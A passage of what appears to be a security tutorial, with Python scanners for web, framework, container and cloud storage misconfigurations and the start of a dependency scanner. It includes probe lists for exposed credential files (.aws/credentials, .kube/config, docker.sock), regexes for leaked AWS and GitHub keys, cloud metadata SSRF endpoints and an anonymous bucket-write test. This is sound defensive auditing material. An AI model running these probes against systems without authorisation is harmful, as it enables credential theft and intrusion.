        test_dirs = ['/static/', '/uploads/', '/images/', '/files/', '/assets/']
        for directory in test_dirs:
            test_url = self.target_url.rstrip('/') + directory
            try:
                response = self.session.get(test_url, timeout=5)
                if '<title>Index of' in response.text or '<h1>Index of' in response.text:
                    server_findings.append({
                        'category': 'Directory Listing',
                        'issue': f'Directory listing enabled at {directory}',
                        'severity': 'MEDIUM',
                        'evidence': f'Directory index page accessible at {test_url}'
                    })
            except requests.RequestException:
                pass
        
        return server_findings
    
    def scan_framework_config(self):
        """Scan framework-specific misconfigurations"""
        framework_findings = []
        
        # Detect framework
        framework = self.detect_framework()
        
        if framework == 'django':
            # Django-specific checks
            test_paths = [
                '/admin',  # Django admin
                '/admin/login',
                '/static/admin',
                '/debug',  # Django debug toolbar
            ]
            
            for path in test_paths:
                test_url = self.target_url.rstrip('/') + path
                response = self.session.get(test_url)
                
                if response.status_code == 200:
                    if 'Django' in response.text:
                        if path == '/admin':
                            framework_findings.append({
                                'category': 'Django',
                                'issue': 'Django admin interface accessible',
                                'severity': 'HIGH' if 'login' not in response.text else 'MEDIUM',
                                'evidence': f'Admin interface at {test_url}'
                            })
                        elif 'debug' in path:
                            framework_findings.append({
                                'category': 'Django',
                                'issue': 'Django debug mode might be enabled',
                                'severity': 'HIGH',
                                'evidence': f'Debug interface at {test_url}'
                            })
        
        elif framework == 'laravel':
            # Laravel-specific checks
            test_paths = [
                '/.env',
                '/storage/logs/laravel.log',
                '/vendor/',
                '/config/',
            ]
            
            for path in test_paths:
                test_url = self.target_url.rstrip('/') + path
                response = self.session.get(test_url)
                
                if response.status_code == 200:
                    if path == '/.env':
                        framework_findings.append({
                            'category': 'Laravel',
                            'issue': '.env file accessible',
                            'severity': 'CRITICAL',
                            'evidence': f'Environment file exposed at {test_url}'
                        })
                    elif 'vendor' in path:
                        framework_findings.append({
                            'category': 'Laravel',
                            'issue': 'Vendor directory accessible',
                            'severity': 'HIGH',
                            'evidence': f'Vendor directory at {test_url}'
                        })
        
        elif framework == 'rails':
            # Ruby on Rails checks
            test_paths = [
                '/rails/info/properties',
                '/rails/mailers',
                '/assets/',
                '/system/',
            ]
            
            for path in test_paths:
                test_url = self.target_url.rstrip('/') + path
                response = self.session.get(test_url)
                
                if response.status_code == 200:
                    if 'rails' in path:
                        framework_findings.append({
                            'category': 'Rails',
                            'issue': 'Rails information pages accessible',
                            'severity': 'HIGH',
                            'evidence': f'Rails info at {test_url}'
                        })
        
        return framework_findings
    
    def scan_cloud_misconfig(self):
        """Scan for cloud service misconfigurations"""
        cloud_findings = []
        
        # Cloud metadata endpoints - only reachable from inside the instance,
        # so these serve as reference payloads for SSRF testing rather than
        # targets the scanner can probe directly
        metadata_endpoints = [
            'http://169.254.169.254/latest/meta-data/',             # AWS
            'http://metadata.google.internal/computeMetadata/v1/',  # GCP
            'http://169.254.169.254/metadata/instance',             # Azure
            'http://100.100.100.200/latest/meta-data/',             # Alibaba Cloud
        ]
        
        # Check for exposed S3/GCP buckets
        bucket_patterns = [
            's3.amazonaws.com',
            'storage.googleapis.com',
            'blob.core.windows.net',
            'digitaloceanspaces.com'
        ]
        
        # Probe for exposed cloud credential files on the web root
        cloud_files = [
            '/.aws/credentials',
            '/.config/gcloud/credentials',
            '/.azure/credentials',
            '/.kube/config'
        ]
        
        for cloud_file in cloud_files:
            test_url = self.target_url.rstrip('/') + cloud_file
            try:
                file_response = self.session.get(test_url, timeout=5)
                if file_response.status_code == 200:
                    cloud_findings.append({
                        'category': 'Cloud Credentials',
                        'issue': f'Cloud credential file exposed: {cloud_file}',
                        'severity': 'CRITICAL',
                        'evidence': f'File accessible at {test_url}'
                    })
            except requests.RequestException:
                pass
        
        # Check response for cloud indicators
        response = self.session.get(self.target_url)
        html = response.text
        
        for pattern in bucket_patterns:
            if pattern in html:
                cloud_findings.append({
                    'category': 'Cloud Storage',
                    'issue': f'Cloud storage URL found: {pattern}',
                    'severity': 'MEDIUM',
                    'evidence': f'Found reference to {pattern} in page source'
                })
        
        # Check for leaked credentials (AWS access key IDs, GitHub tokens) in page source
        cloud_keys = re.findall(r'(AKIA[0-9A-Z]{16})|(gh[oprstu]_[0-9a-zA-Z]{36})', html)
        if cloud_keys:
            cloud_findings.append({
                'category': 'Cloud Credentials',
                'issue': 'Potential cloud credentials found in page source',
                'severity': 'CRITICAL',
                'evidence': f'Found {len(cloud_keys)} potential credential patterns'
            })
        
        return cloud_findings
    
    def scan_container_misconfig(self):
        """Scan for container and orchestration misconfigurations"""
        container_findings = []
        
        # Kubernetes/Docker exposed endpoints
        container_endpoints = [
            '/docker.sock',
            '/var/run/docker.sock',
            '/kubelet',
            '/metrics',
            '/healthz',
            '/readyz',
            '/debug/pprof/',
            '/debug/vars',
            '/api/v1/namespaces',
            '/apis/apps/v1/deployments',
        ]
        
        for endpoint in container_endpoints:
            test_url = self.target_url.rstrip('/') + endpoint
            try:
                response = self.session.get(test_url, timeout=5)
                
                if response.status_code == 200:
                    # Check response content for container indicators
                    if any(indicator in response.text.lower() 
                          for indicator in ['docker', 'kubernetes', 'k8s', 'pod', 'container']):
                        container_findings.append({
                            'category': 'Container Exposure',
                            'issue': f'Container/orchestration endpoint exposed: {endpoint}',
                            'severity': 'CRITICAL',
                            'evidence': f'Endpoint accessible at {test_url}'
                        })
            except requests.RequestException:
                pass
        
        # Check for Docker/K8s configuration files
        config_files = [
            '/.docker/config.json',
            '/.kube/config',
            '/etc/kubernetes/admin.conf',
            '/var/lib/kubelet/config.yaml'
        ]
        
        for config_file in config_files:
            test_url = self.target_url.rstrip('/') + config_file
            response = self.session.get(test_url)
            
            if response.status_code == 200:
                container_findings.append({
                    'category': 'Container Config',
                    'issue': f'Container configuration file exposed: {config_file}',
                    'severity': 'CRITICAL',
                    'evidence': f'Config file accessible at {test_url}'
                })
        
        return container_findings
    
    def scan_application_misconfig(self):
        """Scan for application-level misconfigurations"""
        app_findings = []
        
        # 1. Check for debug modes
        debug_indicators = [
            ('/debug', 'Debug interface'),
            ('/phpinfo', 'PHPInfo'),
            ('/actuator', 'Spring Boot Actuator'),
            ('/_debug', 'Debug endpoint'),
            ('/console', 'Debug console'),
        ]
        
        for endpoint, description in debug_indicators:
            test_url = self.target_url.rstrip('/') + endpoint
            response = self.session.get(test_url)
            
            if response.status_code == 200:
                app_findings.append({
                    'category': 'Debug Mode',
                    'issue': f'{description} accessible',
                    'severity': 'HIGH',
                    'evidence': f'{description} at {test_url}'
                })
        
        # 2. Check for configuration files
        config_files = [
            ('.env', 'Environment file'),
            ('.env.example', 'Example environment file'),
            ('config.xml', 'XML configuration'),
            ('config.json', 'JSON configuration'),
            ('settings.py', 'Python settings'),
            ('application.yml', 'YAML configuration'),
            ('web.config', 'ASP.NET config'),
            ('.htaccess', 'Apache config'),
            ('.git/config', 'Git config'),
        ]
        
        for filename, description in config_files:
            test_url = self.target_url.rstrip('/') + '/' + filename
            response = self.session.get(test_url)
            
            if response.status_code == 200:
                app_findings.append({
                    'category': 'Config File Exposure',
                    'issue': f'{description} exposed',
                    'severity': 'MEDIUM' if 'example' in filename else 'HIGH',
                    'evidence': f'{description} at {test_url}'
                })
        
        # 3. Check for backup files
        backup_patterns = [
            '.bak', '.backup', '.old', '.orig', '.save',
            '_backup', '-backup', '.temp', '.tmp', '.swp'
        ]
        
        # Test common files with backup extensions
        common_files = ['index', 'main', 'app', 'config', 'database', 'settings']
        
        for base_file in common_files:
            for ext in backup_patterns:
                test_url = self.target_url.rstrip('/') + '/' + base_file + ext
                response = self.session.get(test_url)
                
                if response.status_code == 200:
                    app_findings.append({
                        'category': 'Backup Files',
                        'issue': f'Backup file exposed: {base_file}{ext}',
                        'severity': 'MEDIUM',
                        'evidence': f'Backup file at {test_url}'
                    })
        
        return app_findings
    
    def detect_framework(self):
        """Detect web application framework"""
        response = self.session.get(self.target_url)
        html = response.text
        headers = response.headers
        
        # Check headers
        server = headers.get('Server', '').lower()
        powered_by = headers.get('X-Powered-By', '').lower()
        
        # Check HTML patterns
        if 'django' in html.lower() or 'csrfmiddlewaretoken' in html:
            return 'django'
        elif 'laravel' in html.lower() or '/vendor/laravel/' in html:
            return 'laravel'
        elif 'rails' in server or 'rails' in powered_by:
            return 'rails'
        elif 'spring' in html.lower() or 'spring' in server:
            return 'spring'
        elif 'wordpress' in html.lower() or '/wp-content/' in html:
            return 'wordpress'
        elif 'node.js' in server or 'express' in server:
            return 'node'
        elif '.net' in powered_by or 'asp.net' in server:
            return 'aspnet'
        
        return 'unknown'
    
    def run_comprehensive_scan(self):
        """Run all scans and generate report"""
        print(f"[*] Starting comprehensive misconfiguration scan for {self.target_url}")
        
        with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
            futures = {
                executor.submit(self.scan_web_server): 'web_server',
                executor.submit(self.scan_framework_config): 'framework',
                executor.submit(self.scan_cloud_misconfig): 'cloud',
                executor.submit(self.scan_container_misconfig): 'container',
                executor.submit(self.scan_application_misconfig): 'application'
            }
            
            for future in concurrent.futures.as_completed(futures):
                scan_type = futures[future]
                try:
                    findings = future.result()
                    self.findings.extend(findings)
                    print(f"[+] {scan_type} scan completed: {len(findings)} findings")
                except Exception as e:
                    print(f"[-] {scan_type} scan failed: {e}")
        
        # Generate report
        report = self.generate_report()
        return report
    
    def generate_report(self):
        """Generate comprehensive report"""
        report = {
            'target': self.target_url,
            'scan_date': time.strftime('%Y-%m-%d %H:%M:%S'),
            'total_findings': len(self.findings),
            'findings_by_severity': {},
            'detailed_findings': self.findings
        }
        
        # Count by severity
        severities = ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW']
        for severity in severities:
            count = sum(1 for f in self.findings if f['severity'] == severity)
            report['findings_by_severity'][severity] = count
        
        return report

# Usage
scanner = SecurityMisconfigScanner("http://target.com")
report = scanner.run_comprehensive_scan()

print(f"\n{'='*60}")
print(f"SECURITY MISCONFIGURATION SCAN REPORT")
print(f"{'='*60}")
print(f"Target: {report['target']}")
print(f"Scan Date: {report['scan_date']}")
print(f"Total Findings: {report['total_findings']}")
print(f"\nFindings by Severity:")
for severity, count in report['findings_by_severity'].items():
    if count > 0:
        print(f"  {severity}: {count}")

# Print critical findings
critical_findings = [f for f in report['detailed_findings'] if f['severity'] == 'CRITICAL']
if critical_findings:
    print(f"\nCRITICAL FINDINGS:")
    for finding in critical_findings[:5]:  # Show first 5
        print(f"  - {finding['issue']}")
        print(f"    Evidence: {finding['evidence'][:100]}...")

Cloud Storage Misconfiguration Scanner

#!/usr/bin/env python3
"""
Advanced Cloud Storage Misconfiguration Scanner
Covers AWS S3, Google Cloud Storage, Azure Blob Storage
"""
import boto3
from botocore.exceptions import ClientError, NoCredentialsError
from google.cloud import storage
from azure.storage.blob import BlobServiceClient
import requests
import re
import time
import json
import xml.etree.ElementTree as ET
from typing import List, Dict

class CloudStorageScanner:
    def __init__(self, aws_profile=None, gcp_credentials=None, azure_connection_string=None):
        self.aws_profile = aws_profile
        self.gcp_credentials = gcp_credentials
        self.azure_connection_string = azure_connection_string
        self.findings = []
    
    def scan_aws_s3(self):
        """Scan AWS S3 buckets for misconfigurations"""
        s3_findings = []
        
        try:
            if self.aws_profile:
                session = boto3.Session(profile_name=self.aws_profile)
            else:
                session = boto3.Session()
            
            s3 = session.client('s3')
            s3_resource = session.resource('s3')
            
            # List all buckets
            response = s3.list_buckets()
            buckets = response['Buckets']
            
            print(f"[*] Found {len(buckets)} S3 buckets")
            
            for bucket in buckets:
                bucket_name = bucket['Name']
                print(f"[*] Scanning bucket: {bucket_name}")
                
                bucket_findings = []
                
                # 1. Check bucket policy
                try:
                    policy = s3.get_bucket_policy(Bucket=bucket_name)
                    bucket_findings.extend(
                        self.analyze_bucket_policy(policy['Policy'], bucket_name)
                    )
                except ClientError as e:
                    if e.response['Error']['Code'] == 'NoSuchBucketPolicy':
                        bucket_findings.append({
                            'bucket': bucket_name,
                            'issue': 'No bucket policy configured',
                            'severity': 'MEDIUM',
                            'details': 'Bucket has no policy, relying on ACLs'
                        })
                
                # 2. Check bucket ACL
                try:
                    acl = s3.get_bucket_acl(Bucket=bucket_name)
                    bucket_findings.extend(
                        self.analyze_bucket_acl(acl, bucket_name)
                    )
                except ClientError as e:
                    bucket_findings.append({
                        'bucket': bucket_name,
                        'issue': 'Failed to retrieve bucket ACL',
                        'severity': 'MEDIUM',
                        'details': str(e)
                    })
                
                # 3. Check public access block
                try:
                    public_access = s3.get_public_access_block(Bucket=bucket_name)
                    bucket_findings.extend(
                        self.analyze_public_access_block(public_access, bucket_name)
                    )
                except ClientError as e:
                    # Public access block might not be configured
                    pass
                
                # 4. Check for sensitive files
                try:
                    paginator = s3.get_paginator('list_objects_v2')
                    for page in paginator.paginate(Bucket=bucket_name):
                        if 'Contents' in page:
                            for obj in page['Contents']:
                                key = obj['Key']
                                if self.is_sensitive_file(key):
                                    bucket_findings.append({
                                        'bucket': bucket_name,
                                        'issue': 'Sensitive file found in bucket',
                                        'severity': 'HIGH',
                                        'details': f'File: {key}',
                                        'url': f'https://{bucket_name}.s3.amazonaws.com/{key}'
                                    })
                except ClientError as e:
                    bucket_findings.append({
                        'bucket': bucket_name,
                        'issue': 'Failed to list bucket contents',
                        'severity': 'MEDIUM',
                        'details': str(e)
                    })
                
                # 5. Check bucket encryption
                try:
                    encryption = s3.get_bucket_encryption(Bucket=bucket_name)
                    # Encryption is enabled
                except ClientError as e:
                    if e.response['Error']['Code'] == 'ServerSideEncryptionConfigurationNotFoundError':
                        bucket_findings.append({
                            'bucket': bucket_name,
                            'issue': 'Server-side encryption not enabled',
                            'severity': 'MEDIUM',
                            'details': 'Bucket does not have default encryption configured'
                        })
                
                # 6. Check for static website hosting
                try:
                    website = s3.get_bucket_website(Bucket=bucket_name)
                    bucket_findings.append({
                        'bucket': bucket_name,
                        'issue': 'Static website hosting enabled',
                        'severity': 'LOW',
                        'details': 'Bucket configured for static website hosting',
                        'url': f'http://{bucket_name}.s3-website-{session.region_name}.amazonaws.com'
                    })
                except ClientError as e:
                    # Website hosting not enabled
                    pass
                
                # 7. Test for public read access
                public_test = self.test_public_access(bucket_name)
                if public_test['is_public']:
                    bucket_findings.append({
                        'bucket': bucket_name,
                        'issue': 'Bucket is publicly accessible',
                        'severity': 'CRITICAL' if public_test['can_list'] else 'HIGH',
                        'details': public_test['details'],
                        'public_url': f'https://{bucket_name}.s3.amazonaws.com/'
                    })
                
                s3_findings.extend(bucket_findings)
                
        except NoCredentialsError:
            print("[-] No AWS credentials found")
        except Exception as e:
            print(f"[-] AWS S3 scan error: {e}")
        
        return s3_findings
    
    def analyze_bucket_policy(self, policy_json, bucket_name):
        """Analyze S3 bucket policy for misconfigurations"""
        findings = []
        
        try:
            policy = json.loads(policy_json)
            
            for statement in policy.get('Statement', []):
                # Check for wildcard principals ('*' or {'AWS': '*'})
                principal = statement.get('Principal', {})
                if principal == '*' or (isinstance(principal, dict) and principal.get('AWS') == '*'):
                    findings.append({
                        'bucket': bucket_name,
                        'issue': 'Wildcard principal in bucket policy',
                        'severity': 'CRITICAL',
                        'details': 'Policy allows access from any principal',
                        'statement': statement
                    })
                
                # Check for overly permissive actions
                action = statement.get('Action', [])
                if isinstance(action, str):
                    action = [action]
                
                dangerous_actions = [
                    's3:*', 's3:Get*', 's3:Put*', 's3:Delete*',
                    's3:List*', '*'
                ]
                
                for act in action:
                    if act in dangerous_actions:
                        findings.append({
                            'bucket': bucket_name,
                            'issue': 'Overly permissive action in bucket policy',
                            'severity': 'HIGH',
                            'details': f'Action: {act}',
                            'statement': statement
                        })
                
                # Check resource wildcards
                resource = statement.get('Resource', [])
                if isinstance(resource, str):
                    resource = [resource]
                
                for res in resource:
                    if '*' in res:
                        findings.append({
                            'bucket': bucket_name,
                            'issue': 'Wildcard resource in bucket policy',
                            'severity': 'MEDIUM',
                            'details': f'Resource: {res}',
                            'statement': statement
                        })
        
        except json.JSONDecodeError:
            findings.append({
                'bucket': bucket_name,
                'issue': 'Invalid bucket policy JSON',
                'severity': 'MEDIUM',
                'details': 'Bucket policy contains invalid JSON'
            })
        
        return findings
    
    def test_public_access(self, bucket_name):
        """Test if bucket is publicly accessible"""
        result = {
            'is_public': False,
            'can_list': False,
            'can_read': False,
            'can_write': False,
            'details': ''
        }
        
        # Test 1: Anonymous bucket listing
        list_response = None
        try:
            list_response = requests.get(
                f'https://{bucket_name}.s3.amazonaws.com/', timeout=10
            )
            if list_response.status_code == 200:
                result['is_public'] = True
                result['can_list'] = True
                result['details'] += 'Bucket listing is public. '
        except requests.RequestException:
            pass
        
        # Test 2: Anonymous PUT of a harmless marker object
        test_key = f'test_public_write_{int(time.time())}.txt'
        test_url = f'https://{bucket_name}.s3.amazonaws.com/{test_key}'
        
        try:
            put_response = requests.put(
                test_url,
                data='test',
                headers={'Content-Type': 'text/plain'},
                timeout=10
            )
            if put_response.status_code == 200:
                result['is_public'] = True
                result['can_write'] = True
                result['details'] += 'Bucket allows public writes. '
                
                # Clean up the marker object
                requests.delete(test_url, timeout=5)
        except requests.RequestException:
            pass
        
        # Test 3: Anonymous read of an object taken from the listing
        # (uses list_response, not the PUT response from Test 2)
        if result['can_list'] and list_response is not None:
            root = ET.fromstring(list_response.content)
            for elem in root.findall('.//{http://s3.amazonaws.com/doc/2006-03-01/}Key'):
                test_file = elem.text
                if test_file and not test_file.endswith('/'):  # Skip folder placeholders
                    file_url = f'https://{bucket_name}.s3.amazonaws.com/{test_file}'
                    file_response = requests.head(file_url, timeout=10)
                    if file_response.status_code == 200:
                        result['can_read'] = True
                        result['details'] += 'Bucket contains publicly readable files. '
                    break
        
        return result
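
    def analyze_bucket_acl(self, acl, bucket_name):
        """Analyze bucket ACL grants for public grantees.

        Referenced by scan_aws_s3 above but missing from the original
        listing; a minimal sketch based on the standard get_bucket_acl
        response shape.
        """
        findings = []
        public_uris = {
            'http://acs.amazonaws.com/groups/global/AllUsers': 'CRITICAL',
            'http://acs.amazonaws.com/groups/global/AuthenticatedUsers': 'HIGH'
        }
        for grant in acl.get('Grants', []):
            grantee_uri = grant.get('Grantee', {}).get('URI', '')
            if grantee_uri in public_uris:
                findings.append({
                    'bucket': bucket_name,
                    'issue': f'Public ACL grant: {grant.get("Permission")}',
                    'severity': public_uris[grantee_uri],
                    'details': f'Grantee: {grantee_uri}'
                })
        return findings
    
    def analyze_public_access_block(self, public_access, bucket_name):
        """Flag disabled S3 Public Access Block settings.

        Referenced by scan_aws_s3 above but missing from the original
        listing; a minimal sketch.
        """
        findings = []
        config = public_access.get('PublicAccessBlockConfiguration', {})
        for setting in ['BlockPublicAcls', 'IgnorePublicAcls',
                        'BlockPublicPolicy', 'RestrictPublicBuckets']:
            if not config.get(setting, False):
                findings.append({
                    'bucket': bucket_name,
                    'issue': f'Public access block setting disabled: {setting}',
                    'severity': 'MEDIUM',
                    'details': 'All four settings should normally be enabled'
                })
        return findings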
    
    def scan_google_cloud_storage(self):
        """Scan Google Cloud Storage buckets"""
        gcs_findings = []
        
        try:
            if self.gcp_credentials:
                storage_client = storage.Client.from_service_account_json(self.gcp_credentials)
            else:
                storage_client = storage.Client()
            
            buckets = list(storage_client.list_buckets())
            print(f"[*] Found {len(buckets)} GCS buckets")
            
            for bucket in buckets:
                bucket_findings = []
                
                # 1. Check IAM policy
                policy = bucket.get_iam_policy()
                
                for binding in policy.bindings:
                    # Policy bindings are dicts with 'role' and 'members' keys
                    members = binding.get('members', set())
                    role = binding.get('role', '')
                    
                    if 'allUsers' in members:
                        bucket_findings.append({
                            'bucket': bucket.name,
                            'issue': 'Bucket accessible to all users (allUsers)',
                            'severity': 'CRITICAL',
                            'details': f'Role: {role}, Members: {members}'
                        })
                    
                    if 'allAuthenticatedUsers' in members:
                        bucket_findings.append({
                            'bucket': bucket.name,
                            'issue': 'Bucket accessible to all authenticated users',
                            'severity': 'HIGH',
                            'details': f'Role: {role}, Members: {members}'
                        })
                
                # 2. Check bucket permissions (ACL)
                acl = bucket.acl
                
                for entry in acl:
                    if entry['entity'] in ['allUsers', 'allAuthenticatedUsers']:
                        bucket_findings.append({
                            'bucket': bucket.name,
                            'issue': f'Bucket ACL allows public access: {entry["entity"]}',
                            'severity': 'HIGH',
                            'details': f'Role: {entry["role"]}'
                        })
                
                # 3. Check for uniform bucket-level access
                if not bucket.iam_configuration.uniform_bucket_level_access_enabled:
                    bucket_findings.append({
                        'bucket': bucket.name,
                        'issue': 'Uniform bucket-level access disabled',
                        'severity': 'MEDIUM',
                        'details': 'Using fine-grained ACLs instead of IAM'
                    })
                
                # 4. Check default object ACL
                default_acl = bucket.default_object_acl
                
                for entry in default_acl:
                    if entry['entity'] in ['allUsers', 'allAuthenticatedUsers']:
                        bucket_findings.append({
                            'bucket': bucket.name,
                            'issue': 'Default object ACL allows public access',
                            'severity': 'HIGH',
                            'details': f'Entity: {entry["entity"]}, Role: {entry["role"]}'
                        })
                
                gcs_findings.extend(bucket_findings)
                
        except Exception as e:
            print(f"[-] GCS scan error: {e}")
        
        return gcs_findings
    
    def scan_azure_blob_storage(self):
        """Scan Azure Blob Storage containers"""
        azure_findings = []
        
        if not self.azure_connection_string:
            print("[-] Azure connection string required")
            return azure_findings
        
        try:
            blob_service_client = BlobServiceClient.from_connection_string(
                self.azure_connection_string
            )
            
            containers = blob_service_client.list_containers()
            containers_list = list(containers)
            
            print(f"[*] Found {len(containers_list)} Azure containers")
            
            for container in containers_list:
                container_findings = []
                container_name = container['name']
                
                # Get container client
                container_client = blob_service_client.get_container_client(container_name)
                
                # Check container access policy
                access_policy = container_client.get_container_access_policy()
                
                # public_access is None for private containers, 'blob' or 'container' otherwise
                if container['public_access'] is not None:
                    container_findings.append({
                        'container': container_name,
                        'issue': f'Container has public access: {container["public_access"]}',
                        'severity': 'CRITICAL' if container['public_access'] == 'container' else 'HIGH',
                        'details': f'Access level: {container["public_access"]}'
                    })
                
                # Check stored access policies (used to scope SAS tokens)
                for sid in access_policy.get('signed_identifiers') or []:
                    permissions = getattr(sid.access_policy, 'permission', '') or ''
                    # Flag policies that grant both read and write
                    if 'r' in permissions and 'w' in permissions:
                        container_findings.append({
                            'container': container_name,
                            'issue': 'SAS policy allows both read and write',
                            'severity': 'HIGH',
                            'details': f'Permissions: {permissions}'
                        })
                
                # Check for sensitive blobs
                try:
                    blobs = container_client.list_blobs()
                    for blob in blobs:
                        if self.is_sensitive_file(blob.name):
                            container_findings.append({
                                'container': container_name,
                                'issue': 'Sensitive blob found',
                                'severity': 'HIGH',
                                'details': f'Blob: {blob.name}',
                                'url': f'https://{blob_service_client.account_name}.blob.core.windows.net/{container_name}/{blob.name}'
                            })
                except Exception:
                    pass
                
                azure_findings.extend(container_findings)
                
        except Exception as e:
            print(f"[-] Azure storage scan error: {e}")
        
        return azure_findings
    
    def is_sensitive_file(self, filename):
        """Check if filename indicates sensitive content"""
        sensitive_patterns = [
            r'\.(pem|key|ppk|p12|pfx|crt|cer)$',  # Certificates/keys
            r'\.(env|config|conf|ini|properties|yml|yaml|xml|json)$',  # Config files
            r'\.(sql|db|sqlite|mdb|accdb)$',  # Database files
            r'\.(log|txt)$',  # Log files
            r'\.(bak|backup|old|orig|save|swp|tmp)$',  # Backup files
            r'(password|secret|token|key|credential)',  # Sensitive names
            r'(id_rsa|id_dsa|id_ecdsa)',  # SSH keys
            r'\.git/',  # Git files
        ]
        
        filename_lower = filename.lower()
        for pattern in sensitive_patterns:
            if re.search(pattern, filename_lower):
                return True
        
        return False
    
    def run_cloud_storage_scan(self):
        """Run complete cloud storage scan"""
        print("[*] Starting cloud storage misconfiguration scan")
        
        all_findings = []
        
        # AWS S3
        print("[*] Scanning AWS S3...")
        s3_findings = self.scan_aws_s3()
        all_findings.extend(s3_findings)
        print(f"[+] AWS S3 scan complete: {len(s3_findings)} findings")
        
        # Google Cloud Storage
        print("[*] Scanning Google Cloud Storage...")
        gcs_findings = self.scan_google_cloud_storage()
        all_findings.extend(gcs_findings)
        print(f"[+] GCS scan complete: {len(gcs_findings)} findings")
        
        # Azure Blob Storage
        print("[*] Scanning Azure Blob Storage...")
        azure_findings = self.scan_azure_blob_storage()
        all_findings.extend(azure_findings)
        print(f"[+] Azure scan complete: {len(azure_findings)} findings")
        
        # Generate report
        report = {
            'total_findings': len(all_findings),
            'findings_by_severity': self.categorize_findings(all_findings),
            'findings_by_service': {
                'AWS S3': len(s3_findings),
                'Google Cloud Storage': len(gcs_findings),
                'Azure Blob Storage': len(azure_findings)
            },
            'detailed_findings': all_findings
        }
        
        return report
    
    def categorize_findings(self, findings):
        """Categorize findings by severity"""
        categories = {
            'CRITICAL': [],
            'HIGH': [],
            'MEDIUM': [],
            'LOW': []
        }
        
        for finding in findings:
            severity = finding.get('severity', 'MEDIUM')
            if severity in categories:
                categories[severity].append(finding)
        
        return {k: len(v) for k, v in categories.items()}

# Usage

scanner = CloudStorageScanner(
    aws_profile='production',
    gcp_credentials='/path/to/credentials.json',
    azure_connection_string='DefaultEndpointsProtocol=https;AccountName=...'
)

report = scanner.run_cloud_storage_scan()

print(f"\n{'='*60}")
print("CLOUD STORAGE MISCONFIGURATION REPORT")
print(f"{'='*60}")
print(f"Total Findings: {report['total_findings']}")
print(f"\nFindings by Service:")
for service, count in report['findings_by_service'].items():
    if count > 0:
        print(f"  {service}: {count}")

print(f"\nFindings by Severity:")
for severity, count in report['findings_by_severity'].items():
    if count > 0:
        print(f"  {severity}: {count}")

# Print critical findings
critical_findings = [f for f in report['detailed_findings'] if f.get('severity') == 'CRITICAL']
if critical_findings:
    print(f"\nCRITICAL FINDINGS:")
    for finding in critical_findings[:5]:
        print(f"  - {finding.get('bucket', finding.get('container', 'Unknown'))}: {finding['issue']}")

Chapter 6: Vulnerable Components - Advanced Dependency Analysis

6.1 Comprehensive Dependency Vulnerability Scanning

#!/usr/bin/env python3
"""
Advanced Dependency Vulnerability Scanner
Integrates multiple vulnerability databases and scanners
"""
import subprocess
import json
import yaml
import toml
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import Dict, List, Set
import requests
from datetime import datetime
import concurrent.futures

class DependencyVulnerabilityScanner:
    def __init__(self, project_path):
        self.project_path = Path(project_path)
        self.vulnerabilities = []
        self.vulnerability_sources = {
            'nvd': 'https://services.nvd.nist.gov/rest/json/cves/2.0',
            'oss_index': 'https://ossindex.sonatype.org/api/v3/component-report',
            'github_advisory': 'https://api.github.com/advisories'
        }
    
    def scan_all_dependencies(self):
        """Scan all dependency files in project"""
        print(f"[*] Scanning project at {self.project_path}")
        
        dependency_files = self.find_dependency_files()
        print(f"[*] Found {len(dependency_files)} dependency files")
        
        all_vulnerabilities = []
        
        for dep_file in dependency_files:
            print(f"[*] Scanning {dep_file.relative_to(self.project_path)}")
            vulns = self.scan_dependency_file(dep_file)
            all_vulnerabilities.extend(vulns)
        
        # Remove duplicates
        unique_vulns = self.deduplicate_vulnerabilities(all_vulnerabilities)
        
        # Generate report
        report = self.generate_report(unique_vulns)
        return report
    
    def find_dependency_files(self):
        """Find all dependency files in project"""
        dependency_patterns = [
            # Package managers
            'package.json', 'yarn.lock', 'package-lock.json',
            'requirements.txt', 'Pipfile', 'Pipfile.lock', 'poetry.lock',
            'composer.json', 'composer.lock',
            'Gemfile', 'Gemfile.lock',
            'pom.xml', 'build.gradle', 'build.gradle.kts',
            'go.mod', 'go.sum',
            'Cargo.toml', 'Cargo.lock',
            'nuget.config', 'packages.config',
            '*.csproj', '*.vbproj',
            
            # Configuration files that might contain dependencies
            '.terraform.lock.hcl',
            'docker-compose.yml', 'docker-compose.yaml',
            'Dockerfile',
            'environment.yml',  # Conda
            
            # Infrastructure as Code
            '*.tf',  # Terraform
            '*.yml', '*.yaml',  # Ansible, Kubernetes
            
            # CI/CD
            '.github/workflows/*.yml', '.github/workflows/*.yaml',
            '.gitlab-ci.yml',
            'Jenkinsfile',
            '.circleci/config.yml',
            
            # IDE/Editor
            '.vsconfig',
        ]
        
        found_files = []
        
        for pattern in dependency_patterns:
            # rglob handles both literal file names and glob patterns
            for file in self.project_path.rglob(pattern):
                if file.is_file():
                    found_files.append(file)
        
        return list(set(found_files))
    
    def scan_dependency_file(self, file_path):
        """Scan specific dependency file"""
        vulns = []
        
        # Determine file type and use appropriate scanner
        file_ext = file_path.suffix.lower()
        file_name = file_path.name.lower()
        
        try:
            if file_name == 'package.json':
                vulns = self.scan_npm_package(file_path)
            elif file_name in ['yarn.lock', 'package-lock.json']:
                vulns = self.scan_npm_lockfile(file_path)
            elif file_name == 'requirements.txt':
                vulns = self.scan_pip_requirements(file_path)
            elif file_name in ['pom.xml', 'build.gradle', 'build.gradle.kts']:
                vulns = self.scan_java_dependencies(file_path)
            elif file_name in ['gemfile', 'gemfile.lock']:
                vulns = self.scan_ruby_gems(file_path)
            elif file_name in ['composer.json', 'composer.lock']:
                vulns = self.scan_php_composer(file_path)
            elif file_name in ['go.mod', 'go.sum']:
                vulns = self.scan_go_modules(file_path)
            elif file_name in ['cargo.toml', 'cargo.lock']:
                vulns = self.scan_rust_cargo(file_path)
            elif file_name in ['dockerfile']:
                vulns = self.scan_dockerfile(file_path)
            elif file_ext in ['.tf', '.hcl']:
                vulns = self.scan_terraform(file_path)
            elif file_ext in ['.yml', '.yaml']:
                vulns = self.scan_yaml_dependencies(file_path)
            elif file_ext in ['.csproj', '.vbproj']:
                vulns = self.scan_dotnet_proj(file_path)
        except Exception as e:
            print(f"[-] Error scanning {file_path}: {e}")
        
        return vulns
    
    def scan_npm_package(self, file_path):
        """Scan npm package.json for vulnerabilities"""
        vulns = []
        
        with open(file_path) as f:
            package_data = json.load(f)
        
        # Check dependencies
        all_deps = {}
        all_deps.update(package_data.get('dependencies', {}))
        all_deps.update(package_data.get('devDependencies', {}))
